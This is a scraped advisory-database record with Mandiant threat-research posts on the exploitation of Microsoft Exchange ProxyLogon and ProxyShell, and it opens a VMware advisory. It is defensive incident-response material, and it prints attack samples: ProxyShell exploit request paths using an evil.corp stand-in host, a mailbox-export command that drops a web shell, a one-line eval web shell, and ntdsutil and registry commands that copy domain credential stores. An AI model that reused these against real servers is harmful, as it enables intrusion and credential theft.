UMWorkerProcess.exe process, which is associated with Microsoft Exchange Server\u2019s Unified Messaging service. This activity suggested exploitation of CVE-2021-26858.\n\nApproximately twenty days later, the attacker placed another web shell on a separate Microsoft Exchange Server. This second, partially obfuscated web shell, named iisstart.aspx (MD5: 0fd9bffa49c76ee12e51e3b8ae0609ac), was more advanced and contained functions to interact with the file system. As seen in Figure 2, the web shell included the ability to run arbitrary commands and upload, delete, and view the contents of files.\n\n\n\n \nFigure 2: Snippet of iisstart.aspx, uploaded by the attacker in late January 2021\n\nWhile the use of web shells is common amongst threat actors, the parent processes, timing, and victim(s) of these files clearly indicate activity that commenced with the abuse of Microsoft Exchange.\n\nIn March 2021, in a separate environment, we observed a threat actor utilize one or more vulnerabilities to place at least one web shell on the vulnerable Exchange Server. This was likely to establish both persistence and secondary access, as in other environments. In this case, Mandiant observed the process w3wp.exe, (the IIS process associated with the Exchange web front-end) spawning cmd.exe to write a file to disk. The file, depicted in Figure 3, matches signatures for the tried-and-true [China Chopper](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>).\n\n\n\n \nFigure 3: Snippet of China Chopper web shell found on a compromised Exchange Server system\n\nWe observed that in at least two cases, the threat actors subsequently issued the following command against the Exchange web server:\n\nnet group \"Exchange Organization administrators\" administrator /del /domain.\n\nThis command attempts to delete the administrator user from the Exchange Organizations administrators group, beginning with the Domain Controller in the current domain. If the system is in a single-system domain, it will execute on the local computer.\n\nPer Microsoft\u2019s blog, they have identified additional post-exploitation activities, including:\n\n * Credential theft via dumping of LSASS process memory.\n * Compression of data for exfiltration via 7-Zip.\n * Use of Exchange PowerShell Snap-ins to export mailbox data.\n * Use of additional offensive security tools [Covenant](<https://github.com/cobbr/Covenant>), [Nishang](<https://github.com/samratashok/nishang>), and [PowerCat](<https://github.com/besimorhino/powercat>) for remote access.\n\nThe activity we have observed, coupled with others in the information security industry, indicate that these threat actors are likely using Exchange Server vulnerabilities to gain a foothold into environments. This activity is followed quickly by additional access and persistent mechanisms. As previously stated, we have multiple ongoing cases and will continue to provide insight as we respond to intrusions.\n\n#### Investigation Tips\n\nWe recommend checking the following for potential evidence of compromise:\n\n * Child processes of C:\\Windows\\System32\\inetsrv\\w3wp.exe on Exchange Servers, particularly cmd.exe.\n * Files written to the system by w3wp.exe or UMWorkerProcess.exe.\n * ASPX files owned by the SYSTEM user\n * New, unexpected compiled ASPX files in the Temporary ASP.NET Files directory\n * Reconnaissance, vulnerability-testing requests to the following resources from an external IP address: \n * /rpc/ directory\n * /ecp/DDI/DDIService.svc/SetObject\n * Non-existent resources\n * With suspicious or spoofed HTTP User-Agents\n * Unexpected or suspicious Exchange PowerShell SnapIn requests to export mailboxes\n\nIn our investigations to date, the web shells placed on Exchange Servers have been named differently in each intrusion, and thus the file name alone is not a high-fidelity indicator of compromise.\n\nIf you believe your Exchange Server was compromised, we recommend investigating to determine the scope of the attack and dwell time of the threat actor.\n\nFurthermore, as system and web server logs may have time or size limits enforced, we recommend preserving the following artifacts for forensic analysis:\n\n * At least 14 days of HTTP web logs from the inetpub\\Logs\\LogFiles directories (include logs from all subdirectories)\n * The contents of the Exchange Web Server (also found within the inetpub folder)\n * At least 14 days of Exchange Control Panel (ECP) logs, located in Program Files\\Microsoft\\Exchange Server\\v15\\Logging\\ECP\\Server\n * Microsoft Windows event logs\n\nWe have found significant hunting and analysis value in these log folders, especially for suspicious CMD parameters in the ECP Server logs. We will continue updating technical details as we observe more related activity.\n\n#### Technical Indicators\n\nThe following are technical indicators we have observed, organized by the threat groups we currently associate with this activity. To increase investigation transparency, we are including a Last Known True, or LKT, value for network indicators. The LKT timestamp indicates the last time Mandiant knew the indicator was associated with the adversary; however, as with all ongoing intrusions, a reasonable time window should be considered.\n\n##### UNC2639\n\n**Indicator**\n\n| \n\n**Type**\n\n| \n\n**Note** \n \n---|---|--- \n \n165.232.154.116\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/02 02:43 \n \n182.18.152.105\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/03 16:16 \n \n##### UNC2640\n\n**Indicator**\n\n| \n\n**Type**\n\n| \n\n**MD5** \n \n---|---|--- \n \nhelp.aspx\n\n| \n\nFile: Web shell\n\n| \n\n4b3039cf227c611c45d2242d1228a121 \n \niisstart.aspx\n\n| \n\nFile: Web shell\n\n| \n\n0fd9bffa49c76ee12e51e3b8ae0609ac \n \n##### UNC2643\n\n**Indicator**\n\n| \n\n**Type**\n\n| \n\n**MD5/Note** \n \n---|---|--- \n \nCobalt Strike BEACON\n\n| \n\nFile: Shellcode\n\n| \n\n79eb217578bed4c250803bd573b10151 \n \n89.34.111.11\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/03 21:06 \n \n86.105.18.116\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/03 21:39 \n \n#### Detecting the Techniques\n\nFireEye detects this activity across our platforms. The following contains specific detection names that provide an indicator of Exchange Server exploitation or post-exploitation activities we associated with these threat actors.\n\n**_Platform_(s)**\n\n| \n\n**_Detection Name_** \n \n---|--- \n \n * Network Security \n * Email Security \n * Detection On Demand \n * Malware File Scanning \n * Malware File Storage Scanning \n| \n\n * FEC_Trojan_ASPX_Generic_2\n * FE_Webshell_ASPX_Generic_33\n * FEC_APT_Webshell_ASPX_HEARTSHELL_1\n * Exploit.CVE-2021-26855 \n \nEndpoint Security\n\n| \n\n**_Real-Time (IOC)_**\n\n * SUSPICIOUS CODE EXECUTION FROM EXCHANGE SERVER (EXPLOIT)\n * ASPXSPY WEBSHELL CREATION A (BACKDOOR)\n * PROCDUMP ON LSASS.EXE (METHODOLOGY)\n * TASKMGR PROCESS DUMP OF LSASS.EXE A (METHODOLOGY)\n * NISHANG POWERSHELL TCP ONE LINER (BACKDOOR)\n * SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)\n * POWERSHELL DOWNLOADER (METHODOLOGY)\n\n**_Malware Protection (AV/MG)_**\n\n * Trojan.Agent.Hafnium.A\n\n**_Module Coverage_**\n\n * [Process Guard] - prevents dumping of LSASS memory using the procdump utility. \n \nHelix\n\n| \n\n * WINDOWS METHODOLOGY [Unusual Web Server Child Process]\n * MICROSOFT EXCHANGE [Authentication Bypass (CVE-2021-26855)]\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-04T00:00:00", "type": "fireeye", "title": "Detection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T00:00:00", "id": "FIREEYE:C650A7016EEAD895903FB350719E53E3", "href": "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-07T14:46:37", "description": "In August 2021, Mandiant Managed Defense identified and responded to the exploitation of a chain of vulnerabilities known as ProxyShell.** **The ProxyShell vulnerabilities consist of three CVEs (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) affecting the following versions of on-premises Microsoft Exchange Servers.\n\n * Exchange Server 2013 (Cumulative Update 23 and below)\n * Exchange Server 2016 (Cumulative Update 20 and below)\n * Exchange Server 2019 (Cumulative Update 9 and below)\n\nThe vulnerabilities are being tracked in the following CVEs:\n\n**CVE**\n\n| \n\n**Risk Rating**\n\n| \n\n**Access Vector**\n\n| \n\n**Exploitability**\n\n| \n\n**Ease of Attack**\n\n| \n\n**Mandiant Intel** \n \n---|---|---|---|---|--- \n \nCVE-2021-34473\n\n| \n\nHigh\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://advantage.mandiant.com/cve/vulnerability--8e100992-6111-54ed-96b4-f817cf47edd0>) \n \nCVE-2021-34523\n\n| \n\nLow\n\n| \n\nLocal\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://advantage.mandiant.com/cve/vulnerability--f8db969d-dddf-5b2e-81ce-439289be6cde>) \n \nCVE-2021-31207\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://advantage.mandiant.com/cve/vulnerability--5c5c0f7e-96a8-5403-8487-373322342c46>) \n \nTable 1: List of May & July 2021 Microsoft Exchange CVEs and FireEye Intel Summaries\n\n#### Overview\n\nMicrosoft Exchange Server provides email and supporting services for organizations. This solution is used globally, both on-premises and in the cloud. This chain of vulnerabilities exists in unpatched on-premises editions of Microsoft Exchange Server only and is being actively exploited on those servers accessible on the Internet.\n\nMandiant responded to multiple intrusions impacting a wide variety of industries including Education, Government, Business services, and Telecommunications. These organizations are based in the United States, Europe, and Middle East. However, targeting is almost certainly broader than directly observed.\n\nOne specific targeted attack observed by Mandiant, detailed in this post, was against a US-based university where UNC2980 exploited ProxyShell vulnerabilities to gain access to the environment.\n\n#### The Exploit Chain Explained\n\nProxyShell refers to a chain of attacks that exploit three different vulnerabilities affecting on-premises Microsoft Exchange servers to achieve pre-authenticated remote code execution (RCE). The exploitation chain was discovered and [published](<https://www.zerodayinitiative.com/blog/2021/8/17/from-pwn2own-2021-a-new-attack-surface-on-microsoft-exchange-proxyshell>) by Orange Tsai (@orange_8361) from the DEVCORE Research Team.\n\n##### Delivering the Payload\n\nIn order to later create a web shell on a Microsoft Exchange server by exporting from a mailbox, an attacker first needs to create an email item within a mailbox. In the Metasploit implementation of the attack, the Autodiscover service is abused to leak a known user\u2019s distinguished name (DN), which is an address format used internally within Microsoft Exchange. The Messaging Application Programming Interface (MAPI) is then leveraged to leak the user's security identifier (SID), by passing the previously leaked DN as a request. The SID is then used to forge an access token to communicate with Exchange Web Services (EWS).\n\nWith the attacker able to successfully impersonate the target user with a valid access token, they can perform EWS operations. To continue with the ProxyShell attack, the operation \u2018CreateItem\u2019 is used, which allows the remote creation of email messages in the impersonated user\u2019s mailbox. While responding, Mandiant has seen draft emails with attached web shells, encoded in such a way that they become decoded upon export to PST later in the attack (specifically with permutative encoding).\n\nEmails may also be placed in targeted users' mailboxes via SMTP, as was suggested in Orange Tsai\u2019s documentation of the attack.\n\n##### CVE-2021-34473 \u2014 Pre-auth Path Confusion Leads to ACL Bypass\n\nMicrosoft Exchange has a feature called \u2018Explicit Logon\u2019, which legitimately allows users to open another user's mailbox or calendar in a new browser window by providing the mailbox address in the URL. The feature was designed to only provide access where \u2018Full Access\u2019 is granted to the user, and the target mailbox or calendar is configured to publish. Exchange is designed to normalize the specified mailbox address in the URL to identify the target.\n\nThe vulnerability exists in passing the string Autodiscover/Autodiscover.json to the email field in the URL. By passing that string, Exchange does not perform sufficient checks on the address, and through its normalization process, this leads to arbitrary access to backend URLs as NT AUTHORITY/SYSTEM.\n\nGET /autodiscover/autodiscover.json?@evil.corp/?&Email=autodiscover/autodiscover.json%3F@evil.corp\n\nGET /autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp\n\nPOST /autodiscover/autodiscover.json?@evil.corp/autodiscover/autodiscover.xml?&Email=autodiscover/autodiscover.json%3F@evil.corp\n\nPOST /autodiscover/autodiscover.json?@evil.corp/mapi/emsmdb?&Email=autodiscover/autodiscover.json%3F@evil.corp \n \n--- \n \nFigure 1: Requests showing how an attacker can abuse the normalization process of the Explicit Logon feature\n\n##### CVE-2021-34523 \u2014 Elevation of Privilege on Exchange PowerShell Backend\n\nThe Exchange PowerShell Remoting feature, natively built into Microsoft Exchange, was designed to assist with administrative activities via the command line. The previous exploit allowed an attacker to interface with arbitrary backend URLs as NT AUTHORITY/SYSTEM, however since that user does not have a mailbox, the attacker cannot directly interface with the PowerShell backend (/Powershell) at that privilege level.\n\nThe PowerShell backend checks for the X-CommonAccessToken header in incoming requests. If the header does not exist, another method is used to get a CommonAccessToken. This method checks for the X-Rps-CAT parameter in the incoming request, and if present, deserializes this to a valid CommonAccessToken. With the previously collected information on the target mailbox or default information from built-in mailboxes, passing of a valid X-Rps-CAT value is trivial.\n\nBy passing this value to the PowerShell backend with the previously successful access token, an attacker can downgrade from the NT AUTHORITY/SYSTEM account to the target user. This user must have local administrative privileges in order to execute arbitrary Exchange PowerShell commands.\n\nPOST /autodiscover/autodiscover.json?a=abcde@evil.com/powershell/?X-Rps-CAT=[Base64 encoded data] \n \n--- \n \nFigure 2: This request uses the parameter X-Rps-CAT, which allows valid user impersonation\n\n##### CVE-2021-31207 \u2014 Post-auth Arbitrary-File-Write Leads to RCE\n\nOnce the two previous vulnerabilities are exploited successfully, the vulnerability CVE-2021-31207 allows the attacker to write files. As soon as the attacker is able to execute arbitrary PowerShell commands, and the required \u2018Import Export Mailbox\u2019 role is assigned to the impersonated user (which can be achieved by execution of the New-ManagementRoleAssignment cmdlet), the cmdlet New-MailboxExportRequest can be used to export a user\u2019s mailbox to a specific desired path e.g.\n\nNew-MailBoxExportRequest \u2013 Mailbox john.doe@enterprise.corp -FilePath \\\\\\127.0.0.1\\C$\\path\\to\\webshell.aspx \n \n--- \n \nFigure 3: New-MailBoxExportRequest can be used to export payloads\n\nThe use of New-MailboxExportRequest allows the attacker to export target mailboxes where previously created emails with encoded web shells were created. The attacker can export the mailbox to a PST file format with a web file extension, such as ASPX, which allows the attacker to drop a functional web shell, since the encoded attachments in the email are decoded upon write to the PST file format. This is due to the PST file format using permutative encoding, by attaching a pre-encoded payload, upon export the decoded payload is actually written.\n\n#### Observations From Investigations\n\nMandiant responded to intrusions involving ProxyShell exploitation across a range of customers and industries. Examples of proof-of-concept (PoC) exploits developed and released publicly by security researchers could be leveraged by any threat group, leading to adoption by threat groups with varying levels of sophistication. Mandiant has observed the exploit chain resulting in post-exploitation activities, including the deployment of web shells, backdoors, and tunneling utilities to further compromise victim organizations. As of the release of this blog post, Mandiant tracks eight [UNC groups](<https://www.fireeye.com/blog/products-and-services/2020/12/how-mandiant-tracks-uncategorized-threat-actors.html>) exploiting the ProxyShell vulnerabilities. Mandiant anticipates more clusters will be formed as different threat actors adopt working exploits.\n\n##### Exploitation\n\nMandiant has observed the exploitation of Proxyshell starting with the abuse of Autodiscover services to leak known users distinguished name (DN) to then leverage it to leak the administrator security identifier (SID). \n \nBy using the leaked DN and SID, the attacker can create a mailbox that contains a draft email with a malicious payload as an attachment. Afterwards, the mailbox and the contained payload are exported to a web-accessible directory or another directory on the host.\n\nAttempted exploitation of ProxyShell appears to be mostly automated. In some cases, Mandiant observed only partial attacker success, such as the creation of items in mailboxes remotely, but not the exporting of mailboxes and their contained payloads to another directory on the host.\n\nMandiant has observed a wide range of source IP addresses and user agents attempting HTTP requests consistent with the first stage of the ProxyShell exploit chain.\n\n##### Post-Exploitation\n\nUpon successful exploitation of the vulnerabilities, Mandiant observed multiple payloads to gain a foothold in the network including CHINACHOP and BLUEBEAM web shells (see Malware Definitions section). Follow-on actions include execution of internal reconnaissance commands on servers, and deployment of tunneler utilities.\n\n \nFigure 4: BLUEBEAM ASP web shell that was embedded into a PST payload\n\n#### Threat Actor Spotlight: UNC2980\n\nIn August 2021, Mandiant Managed Defense responded to an intrusion leveraging the ProxyShell vulnerability at a US-based university. Mandiant tracks this threat actor as UNC2980.\n\nUNC2980 is a cluster of threat activity tracked since August 2021 and believed to be conducting cyber espionage operations. Mandiant suspects this group to be operating from China currently assessed at low confidence. UNC2980 has been observed exploiting CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, publicly referred to as \"ProxyShell\", to upload web shells for initial access. The group relies on multiple publicly available tools including EARTHWORM, HTRAN, MIMIKATZ, and WMIEXEC post compromise.\n\n#### UNC2980 in Action\n\nUpon gaining access through the exploitation of ProxyShell and deploying a web shell, UNC2980 dropped multiple tools into the victim environment. The following publicly available tools were observed on the initial compromised host: HTRAN, EARTHWORM, and several MIMIKATZ variants.\n\n<script language='JScript' runat='server' Page aspcompat=true>function Page_Load(){eval(Request['cmd'],'unsafe');}</script> \n \n--- \n \nFigure 5: Web shell embedded in PST payload used by UNC2980\n\nApproximately 11 hours and 44 minutes after the ProxyShell exploitation, Mandiant observed post-exploitation activity beginning with multiple Event ID 4648 (A logon was attempted using explicit credentials) events initiated by the process C:\\root\\mimikatz.exe on the initial compromised host. All Event ID 4648 events were associated with two different domain controllers within the environment.\n\nThe group then utilized the utility WMIEXEC to conduct post-exploitation activity. This was primarily observed through the default redirection of command output used by WMIEXEC.\n\ncmd.exe /c whoami > C:\\wmi.dll 2>&1\n\ncmd.exe /c quser > C:\\wmi.dll 2>&1\n\ncmd.exe /c net localgroup administrators > C:\\wmi.dll 2>&1 \n \n--- \n \nFigure 6: Reconnaissance commands executed via WMICEXEC\n\nUNC2980 was observed utilizing several techniques for credential theft once access to a host was established. In one instance, after performing reconnaissance, UNC2980 deployed multiple variants of MIMIKATZ. In another instance, UNC2980 utilized multiple batch files which executed ntdsutil to enumerate snapshots of volumes and were then used to copy ntds.dit and the System hive.\n\nntdsutil snapshot \"List All\" quit quit >>c:\\temp\\1.txt\n\nntdsutil snapshot \"unmount {[GUID]}\" quit quit\n\nnet localgroup administrators\n\nntdsutil snapshot \"activate instance ntds\" create quit quit\n\nntdsutil snapshot \"delete {[GUID] }\" quit quit\n\nntdsutil snapshot \"mount {[GUID]}\" quit quit\n\ncopy c:\\$SNAP_[date]_VOLUMEC$\\windows\\ntds\\ntds.dit c:\\temp\\ntds.dit\n\nreg save hklm\\system c:\\temp\\s.hive \n \n--- \n \nFigure 7: Executed Batch commands\n\n#### Monitoring and Investigating\n\nMandiant recommends monitoring or investigating for compromise on presently or previously vulnerable Exchange servers.\n\n##### Remote Creation of Items in Mailboxes\n\n * Monitor or investigate irregular Exchange EWS logs to identify CreateItem requests, indicating the remote creation of items.\n * Mandiant has observed draft emails created, containing attached encoded web shells, though other items may also be created.\n * Examine logs under \u2018Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\Ews\\\\*\u2019 where:\n * AuthenticatedUser is SYSTEM or a system account\n * SoapAction is CreateItem\n * HttpStatus is 200 (indicating success)\n * Monitor or identify draft emails with encoded attachments.\n * Mandiant has observed draft emails containing .TXT file attachments with encoded content.\n\n##### Remote Unauthenticated PowerShell\n\n * Monitor IIS logs for successful POST requests containing \"/autodiscover/autodiscover.json\" & \"Powershell\".\n * Monitor or investigate the execution of the PowerShell cmdlets \u2018New-ManagementRoleAssignment\u2019 or \u2018New-MailboxExportRequest\u2019.\n * Mandiant has observed \u2018New-ManagementRoleAssignment\u2019 being used to assign mailbox import and export permissions to target mailboxes, followed by \u2018New-MailboxExportRequest\u2019 to export the drafts folder containing emails with encoded web shells attached.\n * Examine PowerShell ScriptBlock, transcription, and module logging where enabled.\n * Examine logs under \u2018Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\CmdletInfra\\Powershell-Proxy\\Cmdlet\\\\*\u2019, especially the cmdlet parameters where:\n * AuthenticatedUser is the name of impersonated mailbox user\n * ProcessName contains w3wp\n * Cmdlet is \u2018New-ManagementRoleAssignment\u2019 or \u2018New-MailboxExportRequest\u2019\n * Mandiant has observed the \u2018CmdletInfra\\Powershell-Proxy\\Cmdlet\u2019 logs recording remote cmdlets and their parameters even when regular PowerShell ScriptBlock/transcription/module logging is not enabled.\n * Mandiant recommends review of these logs on presently or previously vulnerable servers even in cases where no web shell is identified, since attackers may execute any PowerShell cmdlet, utilizing only part of the exploit chain.\n * Examine the \u2018Data\u2019 field in the Audit logs stored under \u2018\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\LocalQueue\\Exchange\\\\*\u2019. This field contains JSON data with the Operation Key value containing the executed PowerShell cmdlets.\n\n#### Creation or Use of Web Shells\n\n * Monitor or identify .ASPX files created under the path inetpub\\wwwroot\\aspnet_client written by SYSTEM.\n * Monitor or identify PST files (by header \u2018!BDN\u2019 / 0x2142444E) with web file extensions (commonly .ASPX). These files may be written by MSMailboxReplication.exe or w3wp.exe (the latter can be the result of replication events due to the exploitation of a different Exchange server in the same cluster).\n * Monitor or identify files created by MSMailboxReplication.exe with extensions other than .PST (this binary is used by the New-MailboxExportRequest PowerShell cmdlet).\n * Monitor or identify arbitrary commands spawned by the process w3wp.exe.\n * Monitor or investigate the \u2018MSExchange Management\u2019 Event logs (EID: 1 and EID: 6) to identify \u2018New-MailboxExportRequest\u2019 requests with .ASPX extensions, indicative of a web shell creation attempt.\n\nAdditional attempted or successful exploitation may be identified by analyzing network and IIS logs looking for HTTP requests matching some of the patterns described in this report.\n\n * Requests against /autodiscover/autodiscover.json containing \u2018powershell\u2019, \u2018mapi/nspi\u2019, \u2018mapi/emsmdb\u2019, \u2018/EWS\u2019 or \u2018X-Rps-CAT'.\n * Status codes 200, 301, or 302 indicating successful exploitation.\n * Status codes 400, 401, or 404 indicating attempted exploitation.\n\n#### Prevention and Remediation\n\nMandiant advises all organizations to apply patches [KB5003435](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-may-11-2021-kb5003435-028bd051-b2f1-4310-8f35-c41c9ce5a2f1>) (CVE-2021-31207) and [KB5001779](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-april-13-2021-kb5001779-8e08f3b3-fc7b-466c-bbb7-5d5aa16ef064>) (CVE-2021-34473 and CVE-2021-34523) to vulnerable on-premises Microsoft Exchange servers to mitigate these vulnerabilities being exploited. To verify the current version of on-premises Microsoft Exchange running within an organization, reference this [Microsoft resource](<https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates>).\n\nIf an organization is not able to immediately apply the patches, inbound TCP/80 and TCP/443 traffic to on-premises Exchange servers should be explicitly blocked from the Internet.\n\nAdditionally, Mandiant recommends organizations review their detection and response capabilities, especially on public-facing infrastructure, including:\n\n * Deploying and configuring a File Integrity Monitoring solution to monitor and/or prevent the creation of files, especially on web servers outside of maintenance windows\n * Deploying, configuring, and monitoring an Endpoint Detection and Response solution to alert to and respond to malicious activity effectively\n * Enabling enhanced logging and implementing sufficient log retention periods to support investigations, including:\n * Microsoft Systems Monitor (Sysmon) on Windows Servers\n * PowerShell Module, Script Block, and Transcription Logging\n\n#### Detecting the Techniques\n\n**Product**\n\n| \n\n**Signature** \n \n---|--- \n \nFireEye Endpoint Security\n\n| \n\n * PST FILEWRITE WITH ASP EXTENSION (METHODOLOGY)\n * W3WP.EXE CHILD PROCESS RECON COMMAND (METHODOLOGY)\n * WMICEXEC (FAMILY) \n \nFireEye Network Security\n\n| \n\n * Exploit.PY.ProxyShell\n * Microsoft Exchange CVE-2021-34473 Remote Code Execution\n * FE_Microsoft Exchange CVE-2021-34473 Remote Code Execution \n \nFireEye Email Security\n\nFireEye Detection On Demand\n\nFireEye Malware File Scanning\n\nFireEye Malware File Storage Scanning\n\n| \n\n * FEC_Exploit_PY_ProxyShell\n * FE_Hunting_PSTWithEmbeddedWebShell\n * FE_Exploit_PY_ProxyShell \n \nFireEye Helix\n\n| \n\n * MICROSOFT EXCHANGE [ProxyShell Exploit Attempt]\n * MICROSOFT EXCHANGE [ProxyShell Exploit Success]\n * MICROSOFT EXCHANGE [Post-Auth Arbitrary-File-Write (CVE-2021-31207) - Mailbox Export]\n * MICROSOFT EXCHANGE [Post-Auth Arbitrary-File-Write (CVE-2021-31207) - Certificate Request Export] \n \n#### Mandiant Security Validation Action\n\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\n\n**VID**\n\n| \n\n**Name** \n \n---|--- \n \nA101-827\n\n| \n\nApplication Vulnerability - CVE-2021- 34473, ProxyShell Vulnerability Check \n \nA101-829\n\n| \n\nApplication Vulnerability - ProxyShell, Exploitation \n \nA101-839\n\n| \n\nMalicious File Transfer - ProxyShell WebShell, Download \n \n#### Malware Definitions\n\n##### BLUEBEAM\n\nBLUEBEAM (aka. Godzilla) is a publicly available web shell management tool written in JAVA. BLUEBEAM can generate web shell payloads in JSP, ASP[.]NET, and PHP, it also supports AES encryption.\n\nBLUEBEAM contains 20 built-in modules that provide features such as loading additional web shells into memory, shell execution, mimikatz, meterpreter, file compression, and privilege escalation.\n\n##### HTRAN\n\nHTRAN is a publicly available tunneler written in C/C++ that serves as a proxy between two endpoints specified via command line arguments.\n\n##### EARTHWORM\n\nEARTHWORM is a publicly available tunneler utility. It is capable of establishing a tunnel to a SOCKS v5 server and is supported on the following operating systems: Linux, MacOS, and Arm-Linux.\n\n##### CHINACHOP\n\nThe CHOPPER web shell is a simple code injection web shell that is capable of executing Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with webserver account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.\n\nFor more detailed analysis, see our blog post on the China Chopper web shell.\n\n#### Acknowledgements\n\nAlex Pennino, Andrew Rector, Harris Ansari and Yash Gupta\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-03T10:00:00", "type": "fireeye", "title": "PST, Want a Shell? ProxyShell Exploiting Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-09-03T10:00:00", "id": "FIREEYE:FC60CAB5C936FF70E94A7C9307805695", "href": "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "carbonblack": [{"lastseen": "2021-03-10T12:27:08", "description": "_The following advisory from VMware Threat Analysis Unit (TAU) is to provide guidance, best practices and capabilities to identify risk, prevent, detect and respond to this emerging threat._\n\n#### Summary\n\nOn March 2, 2021 Microsoft [announced](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) four zero-day vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) directly targeting Microsoft Exchange servers hosted locally.\n\nThese four zero-day vulnerabilities are chained together to gain access to Microsoft Exchange servers as an entry point to exfiltrate data and persist for malicious gain. In order for the attack to work the threat actor would need to access an on-premises Microsoft Exchange server via port 443. Once accessed, the threat actors will then utilize the above vulnerabilities to gain remote access.\n\nIt is best practice if you have Microsoft Exchange Server 2013, 2016, and/or Microsoft Exchange Server 2019 hosted locally to apply the updates provided by Microsoft immediately to protect against these exploits, with an emphasis on prioritizing externally facing Exchange servers.\n\n#### Threat Actor Attribution\n\nMicrosoft identified Hafnium, a state-sponsored threat actor that operates from China, as the group responsible for the recent attacks. Hafnium has also been reported to be responsible for other attacks on internet-facing servers and typically exfiltrate data to file sharing sites. After gaining access to a vulnerable workload, Hafnium will install a web shell that allows them to steal data, upload files, and execute almost any command. Hafnium will then perform a memory dump of an LSASS.exe executable to harvest cached credentials using this web shell. This will enable them export mailboxes and stolen data from the workload and upload it to file-sharing services, where they could later retrieve it.\n\n#### Detections and Recommended Response Actions\n\nThe Microsoft Exchange Server team has created a script to run a check for Hafnium IOCs to address performance and memory concerns. That script is available [here](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>).\n\nMicrosoft Senior Threat Intelligence Analyst [Kevin Beaumont](<https://twitter.com/GossiTheDog/status/1366858907671552005>) has created a [Nmap script](<https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse>) that can be used to scan a network for potentially vulnerable Microsoft Exchange servers.\n\nTo use the script, download it from his GitHub page and store it in /usr/share/nmap/scripts and then use the nmap -script http-vuln-exchange command.\n\nNmap script showing potentially vulnerable Microsoft Exchange server.\n\nOnce you have determined what Exchange servers need to be updated, you need to make sure your servers have a currently supported Cumulative Update (CU) and Update Rollup (RU) installed.\n\nAdministrators can find more information on the supported updates and how to install the patches in an [article from the Microsoft Exchange 